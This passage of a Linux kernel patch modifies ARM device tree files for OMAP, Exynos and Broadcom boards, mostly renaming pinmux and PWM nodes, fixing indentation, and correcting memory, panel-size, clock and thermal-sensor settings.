+index f1412ba83defb..0454423fe166c 100644
+--- a/arch/arm/boot/dts/bcm4708-linksys-ea6500-v2.dts
++++ b/arch/arm/boot/dts/bcm4708-linksys-ea6500-v2.dts
+@@ -19,7 +19,8 @@
+ 
+ 	memory@0 {
+ 		device_type = "memory";
+-		reg = <0x00000000 0x08000000>;
++		reg = <0x00000000 0x08000000>,
++		      <0x88000000 0x08000000>;
+ 	};
+ 
+ 	gpio-keys {
+diff --git a/arch/arm/boot/dts/exynos4210-i9100.dts b/arch/arm/boot/dts/exynos4210-i9100.dts
+index bba85011ecc93..53e023fc1cacf 100644
+--- a/arch/arm/boot/dts/exynos4210-i9100.dts
++++ b/arch/arm/boot/dts/exynos4210-i9100.dts
+@@ -201,8 +201,8 @@
+ 			power-on-delay = <10>;
+ 			reset-delay = <10>;
+ 
+-			panel-width-mm = <90>;
+-			panel-height-mm = <154>;
++			panel-width-mm = <56>;
++			panel-height-mm = <93>;
+ 
+ 			display-timings {
+ 				timing {
+diff --git a/arch/arm/boot/dts/logicpd-torpedo-baseboard.dtsi b/arch/arm/boot/dts/logicpd-torpedo-baseboard.dtsi
+index d3da8b1b473b8..e0cbac500e172 100644
+--- a/arch/arm/boot/dts/logicpd-torpedo-baseboard.dtsi
++++ b/arch/arm/boot/dts/logicpd-torpedo-baseboard.dtsi
+@@ -59,7 +59,7 @@
+ 		};
+ 	};
+ 
+-	pwm10: dmtimer-pwm {
++	pwm10: pwm-10 {
+ 		compatible = "ti,omap-dmtimer-pwm";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pwm_pins>;
+diff --git a/arch/arm/boot/dts/motorola-mapphone-common.dtsi b/arch/arm/boot/dts/motorola-mapphone-common.dtsi
+index c7a1f3ffc48ca..d69f0f4b4990d 100644
+--- a/arch/arm/boot/dts/motorola-mapphone-common.dtsi
++++ b/arch/arm/boot/dts/motorola-mapphone-common.dtsi
+@@ -133,7 +133,7 @@
+ 		dais = <&mcbsp2_port>, <&mcbsp3_port>;
+ 	};
+ 
+-	pwm8: dmtimer-pwm-8 {
++	pwm8: pwm-8 {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&vibrator_direction_pin>;
+ 
+@@ -143,7 +143,7 @@
+ 		ti,clock-source = <0x01>;
+ 	};
+ 
+-	pwm9: dmtimer-pwm-9 {
++	pwm9: pwm-9 {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&vibrator_enable_pin>;
+ 
+@@ -352,13 +352,13 @@
+ &omap4_pmx_core {
+ 
+ 	/* hdmi_hpd.gpio_63 */
+-	hdmi_hpd_gpio: pinmux_hdmi_hpd_pins {
++	hdmi_hpd_gpio: hdmi-hpd-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x098, PIN_INPUT | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	hdq_pins: pinmux_hdq_pins {
++	hdq_pins: hdq-pins {
+ 		pinctrl-single,pins = <
+ 		/* 0x4a100120 hdq_sio.hdq_sio aa27 */
+ 		OMAP4_IOPAD(0x120, PIN_INPUT | MUX_MODE0)
+@@ -366,7 +366,7 @@
+ 	};
+ 
+ 	/* hdmi_cec.hdmi_cec, hdmi_scl.hdmi_scl, hdmi_sda.hdmi_sda */
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)
+ 		OMAP4_IOPAD(0x09c, PIN_INPUT | MUX_MODE0)
+@@ -380,7 +380,7 @@
+ 	 * devices. Off mode value should be tested if we have off mode working
+ 	 * later on.
+ 	 */
+-	mmc3_pins: pinmux_mmc3_pins {
++	mmc3_pins: mmc3-pins {
+ 		pinctrl-single,pins = <
+ 		/* 0x4a10008e gpmc_wait2.gpio_100 d23 */
+ 		OMAP4_IOPAD(0x08e, PIN_INPUT | MUX_MODE3)
+@@ -406,40 +406,40 @@
+ 	};
+ 
+ 	/* gpmc_ncs0.gpio_50 */
+-	poweroff_gpio: pinmux_poweroff_pins {
++	poweroff_gpio: poweroff-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x074, PIN_OUTPUT_PULLUP | MUX_MODE3)
+ 		>;
+ 	};
+ 
+ 	/* kpd_row0.gpio_178 */
+-	tmp105_irq: pinmux_tmp105_irq {
++	tmp105_irq: tmp105-irq-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x18e, PIN_INPUT_PULLUP | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	usb_gpio_mux_sel1: pinmux_usb_gpio_mux_sel1_pins {
++	usb_gpio_mux_sel1: usb-gpio-mux-sel1-pins {
+ 		/* gpio_60 */
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x088, PIN_OUTPUT | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	touchscreen_pins: pinmux_touchscreen_pins {
++	touchscreen_pins: touchscreen-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x180, PIN_OUTPUT | MUX_MODE3)
+ 		OMAP4_IOPAD(0x1a0, PIN_INPUT_PULLUP | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	als_proximity_pins: pinmux_als_proximity_pins {
++	als_proximity_pins: als-proximity-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x18c, PIN_INPUT_PULLUP | MUX_MODE3)
+ 		>;
+ 	};
+ 
+-	usb_mdm6600_pins: pinmux_usb_mdm6600_pins {
++	usb_mdm6600_pins: usb-mdm6600-pins {
+ 		pinctrl-single,pins = <
+ 		/* enable 0x4a1000d8 usbb1_ulpitll_dat7.gpio_95 ag16 */
+ 		OMAP4_IOPAD(0x0d8, PIN_INPUT | MUX_MODE3)
+@@ -476,7 +476,7 @@
+ 		>;
+ 	};
+ 
+-	usb_ulpi_pins: pinmux_usb_ulpi_pins {
++	usb_ulpi_pins: usb-ulpi-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x196, MUX_MODE7)
+ 		OMAP4_IOPAD(0x198, MUX_MODE7)
+@@ -496,7 +496,7 @@
+ 	};
+ 
+ 	/* usb0_otg_dp and usb0_otg_dm */
+-	usb_utmi_pins: pinmux_usb_utmi_pins {
++	usb_utmi_pins: usb-utmi-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x196, PIN_INPUT | MUX_MODE0)
+ 		OMAP4_IOPAD(0x198, PIN_INPUT | MUX_MODE0)
+@@ -521,7 +521,7 @@
+ 	 * when not used. If needed, we can add rts pin remux later based
+ 	 * on power measurements.
+ 	 */
+-	uart1_pins: pinmux_uart1_pins {
++	uart1_pins: uart1-pins {
+ 		pinctrl-single,pins = <
+ 		/* 0x4a10013c mcspi1_cs2.uart1_cts ag23 */
+ 		OMAP4_IOPAD(0x13c, PIN_INPUT_PULLUP | MUX_MODE1)
+@@ -538,7 +538,7 @@
+ 	};
+ 
+ 	/* uart3_tx_irtx and uart3_rx_irrx */
+-	uart3_pins: pinmux_uart3_pins {
++	uart3_pins: uart3-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x196, MUX_MODE7)
+ 		OMAP4_IOPAD(0x198, MUX_MODE7)
+@@ -557,7 +557,7 @@
+ 		>;
+ 	};
+ 
+-	uart4_pins: pinmux_uart4_pins {
++	uart4_pins: uart4-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x15c, PIN_INPUT | MUX_MODE0)		/* uart4_rx */
+ 		OMAP4_IOPAD(0x15e, PIN_OUTPUT | MUX_MODE0)		/* uart4_tx */
+@@ -566,7 +566,7 @@
+ 		>;
+ 	};
+ 
+-	mcbsp2_pins: pinmux_mcbsp2_pins {
++	mcbsp2_pins: mcbsp2-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x0f6, PIN_INPUT | MUX_MODE0)	/* abe_mcbsp2_clkx */
+ 		OMAP4_IOPAD(0x0f8, PIN_INPUT | MUX_MODE0)	/* abe_mcbsp2_dr */
+@@ -575,7 +575,7 @@
+ 		>;
+ 	};
+ 
+-	mcbsp3_pins: pinmux_mcbsp3_pins {
++	mcbsp3_pins: mcbsp3-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x106, PIN_INPUT | MUX_MODE1)	/* abe_mcbsp3_dr */
+ 		OMAP4_IOPAD(0x108, PIN_OUTPUT | MUX_MODE1)	/* abe_mcbsp3_dx */
+@@ -584,13 +584,13 @@
+ 		>;
+ 	};
+ 
+-	vibrator_direction_pin: pinmux_vibrator_direction_pin {
++	vibrator_direction_pin: vibrator-direction-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x1ce, PIN_OUTPUT | MUX_MODE1)	/* dmtimer8_pwm_evt (gpio_27) */
+ 		>;
+ 	};
+ 
+-	vibrator_enable_pin: pinmux_vibrator_enable_pin {
++	vibrator_enable_pin: vibrator-enable-pins {
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0X1d0, PIN_OUTPUT | MUX_MODE1)	/* dmtimer9_pwm_evt (gpio_28) */
+ 		>;
+@@ -598,7 +598,7 @@
+ };
+ 
+ &omap4_pmx_wkup {
+-	usb_gpio_mux_sel2: pinmux_usb_gpio_mux_sel2_pins {
++	usb_gpio_mux_sel2: usb-gpio-mux-sel2-pins {
+ 		/* gpio_wk0 */
+ 		pinctrl-single,pins = <
+ 		OMAP4_IOPAD(0x040, PIN_OUTPUT_PULLDOWN | MUX_MODE3)
+@@ -614,12 +614,12 @@
+ /* Configure pwm clock source for timers 8 & 9 */
+ &timer8 {
+ 	assigned-clocks = <&abe_clkctrl OMAP4_TIMER8_CLKCTRL 24>;
+-	assigned-clock-parents = <&sys_clkin_ck>;
++	assigned-clock-parents = <&sys_32k_ck>;
+ };
+ 
+ &timer9 {
+ 	assigned-clocks = <&l4_per_clkctrl OMAP4_TIMER9_CLKCTRL 24>;
+-	assigned-clock-parents = <&sys_clkin_ck>;
++	assigned-clock-parents = <&sys_32k_ck>;
+ };
+ 
+ /*
+diff --git a/arch/arm/boot/dts/omap-gpmc-smsc911x.dtsi b/arch/arm/boot/dts/omap-gpmc-smsc911x.dtsi
+index ce6c235f68ec6..3046ec572632d 100644
+--- a/arch/arm/boot/dts/omap-gpmc-smsc911x.dtsi
++++ b/arch/arm/boot/dts/omap-gpmc-smsc911x.dtsi
+@@ -8,9 +8,9 @@
+ 
+ / {
+ 	vddvario: regulator-vddvario {
+-		  compatible = "regulator-fixed";
+-		  regulator-name = "vddvario";
+-		  regulator-always-on;
++		compatible = "regulator-fixed";
++		regulator-name = "vddvario";
++		regulator-always-on;
+ 	};
+ 
+ 	vdd33a: regulator-vdd33a {
+diff --git a/arch/arm/boot/dts/omap-gpmc-smsc9221.dtsi b/arch/arm/boot/dts/omap-gpmc-smsc9221.dtsi
+index e7534fe9c53cf..bc8961f3690f0 100644
+--- a/arch/arm/boot/dts/omap-gpmc-smsc9221.dtsi
++++ b/arch/arm/boot/dts/omap-gpmc-smsc9221.dtsi
+@@ -12,9 +12,9 @@
+ 
+ / {
+ 	vddvario: regulator-vddvario {
+-		  compatible = "regulator-fixed";
+-		  regulator-name = "vddvario";
+-		  regulator-always-on;
++		compatible = "regulator-fixed";
++		regulator-name = "vddvario";
++		regulator-always-on;
+ 	};
+ 
+ 	vdd33a: regulator-vdd33a {
+diff --git a/arch/arm/boot/dts/omap3-cm-t3517.dts b/arch/arm/boot/dts/omap3-cm-t3517.dts
+index 3b8349094baa6..f25c0a84a190c 100644
+--- a/arch/arm/boot/dts/omap3-cm-t3517.dts
++++ b/arch/arm/boot/dts/omap3-cm-t3517.dts
+@@ -11,12 +11,12 @@
+ 	model = "CompuLab CM-T3517";
+ 	compatible = "compulab,omap3-cm-t3517", "ti,am3517", "ti,omap3";
+ 
+-	vmmc:  regulator-vmmc {
+-                compatible = "regulator-fixed";
+-                regulator-name = "vmmc";
+-                regulator-min-microvolt = <3300000>;
+-                regulator-max-microvolt = <3300000>;
+-        };
++	vmmc: regulator-vmmc {
++		compatible = "regulator-fixed";
++		regulator-name = "vmmc";
++		regulator-min-microvolt = <3300000>;
++		regulator-max-microvolt = <3300000>;
++	};
+ 
+ 	wl12xx_vmmc2: wl12xx_vmmc2 {
+ 		compatible = "regulator-fixed";
+diff --git a/arch/arm/boot/dts/omap3-cpu-thermal.dtsi b/arch/arm/boot/dts/omap3-cpu-thermal.dtsi
+index 0da759f8e2c2d..7dd2340bc5e45 100644
+--- a/arch/arm/boot/dts/omap3-cpu-thermal.dtsi
++++ b/arch/arm/boot/dts/omap3-cpu-thermal.dtsi
+@@ -12,8 +12,7 @@ cpu_thermal: cpu-thermal {
+ 	polling-delay = <1000>; /* milliseconds */
+ 	coefficients = <0 20000>;
+ 
+-			/* sensor       ID */
+-	thermal-sensors = <&bandgap     0>;
++	thermal-sensors = <&bandgap>;
+ 
+ 	cpu_trips: trips {
+ 		cpu_alert0: cpu_alert {
+diff --git a/arch/arm/boot/dts/omap3-gta04.dtsi b/arch/arm/boot/dts/omap3-gta04.dtsi
+index 2dbee248a126f..e0be0fb23f80f 100644
+--- a/arch/arm/boot/dts/omap3-gta04.dtsi
++++ b/arch/arm/boot/dts/omap3-gta04.dtsi
+@@ -147,7 +147,7 @@
+ 		pinctrl-0 = <&backlight_pins>;
+ 	};
+ 
+-	pwm11: dmtimer-pwm {
++	pwm11: pwm-11 {
+ 		compatible = "ti,omap-dmtimer-pwm";
+ 		ti,timers = <&timer11>;
+ 		#pwm-cells = <3>;
+@@ -332,7 +332,7 @@
+ 			OMAP3_CORE1_IOPAD(0x2108, PIN_OUTPUT | MUX_MODE0)   /* dss_data22.dss_data22 */
+ 			OMAP3_CORE1_IOPAD(0x210a, PIN_OUTPUT | MUX_MODE0)   /* dss_data23.dss_data23 */
+ 		>;
+-       };
++	};
+ 
+ 	gps_pins: pinmux_gps_pins {
+ 		pinctrl-single,pins = <
+@@ -869,8 +869,8 @@
+ };
+ 
+ &hdqw1w {
+-        pinctrl-names = "default";
+-        pinctrl-0 = <&hdq_pins>;
++	pinctrl-names = "default";
++	pinctrl-0 = <&hdq_pins>;
+ };
+ 
+ /* image signal processor within OMAP3 SoC */
+diff --git a/arch/arm/boot/dts/omap3-ldp.dts b/arch/arm/boot/dts/omap3-ldp.dts
+index 36fc8805e0c15..85f33bbb566f9 100644
+--- a/arch/arm/boot/dts/omap3-ldp.dts
++++ b/arch/arm/boot/dts/omap3-ldp.dts
+@@ -301,5 +301,5 @@
+ 
+ &vaux1 {
+ 	/* Needed for ads7846 */
+-        regulator-name = "vcc";
++	regulator-name = "vcc";
+ };
+diff --git a/arch/arm/boot/dts/omap3-n900.dts b/arch/arm/boot/dts/omap3-n900.dts
+index dd79715564498..89ab08d83261a 100644
+--- a/arch/arm/boot/dts/omap3-n900.dts
++++ b/arch/arm/boot/dts/omap3-n900.dts
+@@ -156,7 +156,7 @@
+ 		io-channel-names = "temp", "bsi", "vbat";
+ 	};
+ 
+-	pwm9: dmtimer-pwm {
++	pwm9: pwm-9 {
+ 		compatible = "ti,omap-dmtimer-pwm";
+ 		#pwm-cells = <3>;
+ 		ti,timers = <&timer9>;
+@@ -236,27 +236,27 @@
+ 		pinctrl-single,pins = <
+ 
+ 			/* address lines */
+-                        OMAP3_CORE1_IOPAD(0x207a, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a1.gpmc_a1 */
+-                        OMAP3_CORE1_IOPAD(0x207c, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a2.gpmc_a2 */
+-                        OMAP3_CORE1_IOPAD(0x207e, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a3.gpmc_a3 */
++			OMAP3_CORE1_IOPAD(0x207a, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a1.gpmc_a1 */
++			OMAP3_CORE1_IOPAD(0x207c, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a2.gpmc_a2 */
++			OMAP3_CORE1_IOPAD(0x207e, PIN_OUTPUT | MUX_MODE0)       /* gpmc_a3.gpmc_a3 */
+ 
+ 			/* data lines, gpmc_d0..d7 not muxable according to TRM */
+-                        OMAP3_CORE1_IOPAD(0x209e, PIN_INPUT | MUX_MODE0)        /* gpmc_d8.gpmc_d8 */
+-                        OMAP3_CORE1_IOPAD(0x20a0, PIN_INPUT | MUX_MODE0)        /* gpmc_d9.gpmc_d9 */
+-                        OMAP3_CORE1_IOPAD(0x20a2, PIN_INPUT | MUX_MODE0)        /* gpmc_d10.gpmc_d10 */
+-                        OMAP3_CORE1_IOPAD(0x20a4, PIN_INPUT | MUX_MODE0)        /* gpmc_d11.gpmc_d11 */
+-                        OMAP3_CORE1_IOPAD(0x20a6, PIN_INPUT | MUX_MODE0)        /* gpmc_d12.gpmc_d12 */
+-                        OMAP3_CORE1_IOPAD(0x20a8, PIN_INPUT | MUX_MODE0)        /* gpmc_d13.gpmc_d13 */
+-                        OMAP3_CORE1_IOPAD(0x20aa, PIN_INPUT | MUX_MODE0)        /* gpmc_d14.gpmc_d14 */
+-                        OMAP3_CORE1_IOPAD(0x20ac, PIN_INPUT | MUX_MODE0)        /* gpmc_d15.gpmc_d15 */
++			OMAP3_CORE1_IOPAD(0x209e, PIN_INPUT | MUX_MODE0)        /* gpmc_d8.gpmc_d8 */
++			OMAP3_CORE1_IOPAD(0x20a0, PIN_INPUT | MUX_MODE0)        /* gpmc_d9.gpmc_d9 */
++			OMAP3_CORE1_IOPAD(0x20a2, PIN_INPUT | MUX_MODE0)        /* gpmc_d10.gpmc_d10 */
++			OMAP3_CORE1_IOPAD(0x20a4, PIN_INPUT | MUX_MODE0)        /* gpmc_d11.gpmc_d11 */
++			OMAP3_CORE1_IOPAD(0x20a6, PIN_INPUT | MUX_MODE0)        /* gpmc_d12.gpmc_d12 */
++			OMAP3_CORE1_IOPAD(0x20a8, PIN_INPUT | MUX_MODE0)        /* gpmc_d13.gpmc_d13 */
++			OMAP3_CORE1_IOPAD(0x20aa, PIN_INPUT | MUX_MODE0)        /* gpmc_d14.gpmc_d14 */
++			OMAP3_CORE1_IOPAD(0x20ac, PIN_INPUT | MUX_MODE0)        /* gpmc_d15.gpmc_d15 */
+ 
+ 			/*
+ 			 * gpmc_ncs0, gpmc_nadv_ale, gpmc_noe, gpmc_nwe, gpmc_wait0 not muxable
+ 			 * according to TRM. OneNAND seems to require PIN_INPUT on clock.
+ 			 */
+-                        OMAP3_CORE1_IOPAD(0x20b0, PIN_OUTPUT | MUX_MODE0)       /* gpmc_ncs1.gpmc_ncs1 */
+-                        OMAP3_CORE1_IOPAD(0x20be, PIN_INPUT | MUX_MODE0)        /* gpmc_clk.gpmc_clk */
+-		>;
++			OMAP3_CORE1_IOPAD(0x20b0, PIN_OUTPUT | MUX_MODE0)       /* gpmc_ncs1.gpmc_ncs1 */
++			OMAP3_CORE1_IOPAD(0x20be, PIN_INPUT | MUX_MODE0)        /* gpmc_clk.gpmc_clk */
++			>;
+ 	};
+ 
+ 	i2c1_pins: pinmux_i2c1_pins {
+@@ -738,12 +738,12 @@
+ 
+ 	si4713: si4713@63 {
+ 		compatible = "silabs,si4713";
+-                reg = <0x63>;
++		reg = <0x63>;
+ 
+-                interrupts-extended = <&gpio2 21 IRQ_TYPE_EDGE_FALLING>; /* 53 */
+-                reset-gpios = <&gpio6 3 GPIO_ACTIVE_HIGH>; /* 163 */
+-                vio-supply = <&vio>;
+-                vdd-supply = <&vaux1>;
++		interrupts-extended = <&gpio2 21 IRQ_TYPE_EDGE_FALLING>; /* 53 */
++		reset-gpios = <&gpio6 3 GPIO_ACTIVE_HIGH>; /* 163 */
++		vio-supply = <&vio>;
++		vdd-supply = <&vaux1>;
+ 	};
+ 
+ 	bq24150a: bq24150a@6b {
+diff --git a/arch/arm/boot/dts/omap3-zoom3.dts b/arch/arm/boot/dts/omap3-zoom3.dts
+index 0482676d18306..ce58b1f208e81 100644
+--- a/arch/arm/boot/dts/omap3-zoom3.dts
++++ b/arch/arm/boot/dts/omap3-zoom3.dts
+@@ -23,9 +23,9 @@
+ 	};
+ 
+ 	vddvario: regulator-vddvario {
+-		  compatible = "regulator-fixed";
+-		  regulator-name = "vddvario";
+-		  regulator-always-on;
++		compatible = "regulator-fixed";
++		regulator-name = "vddvario";
++		regulator-always-on;
+ 	};
+ 
+ 	vdd33a: regulator-vdd33a {
+@@ -84,28 +84,28 @@
+ 
+ 	uart1_pins: pinmux_uart1_pins {
+ 		pinctrl-single,pins = <
+-                        OMAP3_CORE1_IOPAD(0x2180, PIN_INPUT | MUX_MODE0)		/* uart1_cts.uart1_cts */
+-                        OMAP3_CORE1_IOPAD(0x217e, PIN_OUTPUT | MUX_MODE0)		/* uart1_rts.uart1_rts */
+-                        OMAP3_CORE1_IOPAD(0x2182, WAKEUP_EN | PIN_INPUT | MUX_MODE0) /* uart1_rx.uart1_rx */
+-                        OMAP3_CORE1_IOPAD(0x217c, PIN_OUTPUT | MUX_MODE0)		/* uart1_tx.uart1_tx */
++			OMAP3_CORE1_IOPAD(0x2180, PIN_INPUT | MUX_MODE0)		/* uart1_cts.uart1_cts */
++			OMAP3_CORE1_IOPAD(0x217e, PIN_OUTPUT | MUX_MODE0)		/* uart1_rts.uart1_rts */
++			OMAP3_CORE1_IOPAD(0x2182, WAKEUP_EN | PIN_INPUT | MUX_MODE0) /* uart1_rx.uart1_rx */
++			OMAP3_CORE1_IOPAD(0x217c, PIN_OUTPUT | MUX_MODE0)		/* uart1_tx.uart1_tx */
+ 		>;
+ 	};
+ 
+ 	uart2_pins: pinmux_uart2_pins {
+ 		pinctrl-single,pins = <
+-                        OMAP3_CORE1_IOPAD(0x2174, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts */
+-                        OMAP3_CORE1_IOPAD(0x2176, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
+-                        OMAP3_CORE1_IOPAD(0x217a, PIN_INPUT | MUX_MODE0)		/* uart2_rx.uart2_rx */
+-                        OMAP3_CORE1_IOPAD(0x2178, PIN_OUTPUT | MUX_MODE0)		/* uart2_tx.uart2_tx */
++			OMAP3_CORE1_IOPAD(0x2174, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts */
++			OMAP3_CORE1_IOPAD(0x2176, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
++			OMAP3_CORE1_IOPAD(0x217a, PIN_INPUT | MUX_MODE0)		/* uart2_rx.uart2_rx */
++			OMAP3_CORE1_IOPAD(0x2178, PIN_OUTPUT | MUX_MODE0)		/* uart2_tx.uart2_tx */
+ 		>;
+ 	};
+ 
+ 	uart3_pins: pinmux_uart3_pins {
+ 		pinctrl-single,pins = <
+-                        OMAP3_CORE1_IOPAD(0x219a, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* uart3_cts_rctx.uart3_cts_rctx */
+-                        OMAP3_CORE1_IOPAD(0x219c, PIN_OUTPUT | MUX_MODE0)		/* uart3_rts_sd.uart3_rts_sd */
+-                        OMAP3_CORE1_IOPAD(0x219e, PIN_INPUT | MUX_MODE0)		/* uart3_rx_irrx.uart3_rx_irrx */
+-                        OMAP3_CORE1_IOPAD(0x21a0, PIN_OUTPUT | MUX_MODE0)		/* uart3_tx_irtx.uart3_tx_irtx */
++			OMAP3_CORE1_IOPAD(0x219a, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* uart3_cts_rctx.uart3_cts_rctx */
++			OMAP3_CORE1_IOPAD(0x219c, PIN_OUTPUT | MUX_MODE0)		/* uart3_rts_sd.uart3_rts_sd */
++			OMAP3_CORE1_IOPAD(0x219e, PIN_INPUT | MUX_MODE0)		/* uart3_rx_irrx.uart3_rx_irrx */
++			OMAP3_CORE1_IOPAD(0x21a0, PIN_OUTPUT | MUX_MODE0)		/* uart3_tx_irtx.uart3_tx_irtx */
+ 		>;
+ 	};
+ 
+@@ -205,22 +205,22 @@
+ };
+ 
+ &uart1 {
+-       pinctrl-names = "default";
+-       pinctrl-0 = <&uart1_pins>;
++	pinctrl-names = "default";
++	pinctrl-0 = <&uart1_pins>;
+ };
+ 
+ &uart2 {
+-       pinctrl-names = "default";
+-       pinctrl-0 = <&uart2_pins>;
++	pinctrl-names = "default";
++	pinctrl-0 = <&uart2_pins>;
+ };
+ 
+ &uart3 {
+-       pinctrl-names = "default";
+-       pinctrl-0 = <&uart3_pins>;
++	pinctrl-names = "default";
++	pinctrl-0 = <&uart3_pins>;
+ };
+ 
+ &uart4 {
+-       status = "disabled";
++	status = "disabled";
+ };
+ 
+ &usb_otg_hs {
+diff --git a/arch/arm/boot/dts/omap4-cpu-thermal.dtsi b/arch/arm/boot/dts/omap4-cpu-thermal.dtsi
+index 4d7eeb133dadd..d484ec1e4fd86 100644
+--- a/arch/arm/boot/dts/omap4-cpu-thermal.dtsi
++++ b/arch/arm/boot/dts/omap4-cpu-thermal.dtsi
+@@ -12,21 +12,24 @@ cpu_thermal: cpu_thermal {
+ 	polling-delay-passive = <250>; /* milliseconds */
+ 	polling-delay = <1000>; /* milliseconds */
+ 
+-			/* sensor       ID */
+-        thermal-sensors = <&bandgap     0>;
++	/*
++	 * See 44xx files for single sensor addressing, omap5 and dra7 need
++	 * also sensor ID for addressing.
++	 */
++	thermal-sensors = <&bandgap     0>;
+ 
+ 	cpu_trips: trips {
+-                cpu_alert0: cpu_alert {
+-                        temperature = <100000>; /* millicelsius */
+-                        hysteresis = <2000>; /* millicelsius */
+-                        type = "passive";
+-                };
+-                cpu_crit: cpu_crit {
+-                        temperature = <125000>; /* millicelsius */
+-                        hysteresis = <2000>; /* millicelsius */
+-                        type = "critical";
+-                };
+-        };
++		cpu_alert0: cpu_alert {
++			temperature = <100000>; /* millicelsius */
++			hysteresis = <2000>; /* millicelsius */
++			type = "passive";
++		};
++		cpu_crit: cpu_crit {
++			temperature = <125000>; /* millicelsius */
++			hysteresis = <2000>; /* millicelsius */
++			type = "critical";
++		};
++	};
+ 
+ 	cpu_cooling_maps: cooling-maps {
+ 		map0 {
+diff --git a/arch/arm/boot/dts/omap4-duovero-parlor.dts b/arch/arm/boot/dts/omap4-duovero-parlor.dts
+index b294c22177cbf..6d1beb453234e 100644
+--- a/arch/arm/boot/dts/omap4-duovero-parlor.dts
++++ b/arch/arm/boot/dts/omap4-duovero-parlor.dts
+@@ -62,33 +62,33 @@
+ 			&smsc_pins
+ 	>;
+ 
+-	led_pins: pinmux_led_pins {
++	led_pins: led-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x116, PIN_OUTPUT | MUX_MODE3)		/* abe_dmic_din3.gpio_122 */
+ 		>;
+ 	};
+ 
+-	button_pins: pinmux_button_pins {
++	button_pins: button-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x114, PIN_INPUT_PULLUP | MUX_MODE3)	/* abe_dmic_din2.gpio_121 */
+ 		>;
+ 	};
+ 
+-	i2c2_pins: pinmux_i2c2_pins {
++	i2c2_pins: i2c2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x126, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_scl */
+ 			OMAP4_IOPAD(0x128, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	smsc_pins: pinmux_smsc_pins {
++	smsc_pins: smsc-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x068, PIN_INPUT | MUX_MODE3)		/* gpmc_a20.gpio_44: IRQ */
+ 			OMAP4_IOPAD(0x06a, PIN_INPUT_PULLUP | MUX_MODE3)	/* gpmc_a21.gpio_45: nReset */
+@@ -96,7 +96,7 @@
+ 		>;
+ 	};
+ 
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x098, PIN_INPUT | MUX_MODE3)		/* hdmi_hpd.gpio_63 */
+ 			OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)		/* hdmi_cec.hdmi_cec */
+diff --git a/arch/arm/boot/dts/omap4-duovero.dtsi b/arch/arm/boot/dts/omap4-duovero.dtsi
+index 805dfd40030dc..b8af455b411a9 100644
+--- a/arch/arm/boot/dts/omap4-duovero.dtsi
++++ b/arch/arm/boot/dts/omap4-duovero.dtsi
+@@ -73,14 +73,14 @@
+ 			&hsusbb1_pins
+ 	>;
+ 
+-	twl6040_pins: pinmux_twl6040_pins {
++	twl6040_pins: twl6040-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x166, PIN_OUTPUT | MUX_MODE3)		/* usbb2_ulpitll_nxt.gpio_160 */
+ 			OMAP4_IOPAD(0x1a0, PIN_INPUT | MUX_MODE0)		/* sys_nirq2.sys_nirq2 */
+ 		>;
+ 	};
+ 
+-	mcbsp1_pins: pinmux_mcbsp1_pins {
++	mcbsp1_pins: mcbsp1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0fe, PIN_INPUT | MUX_MODE0)		/* abe_mcbsp1_clkx.abe_mcbsp1_clkx */
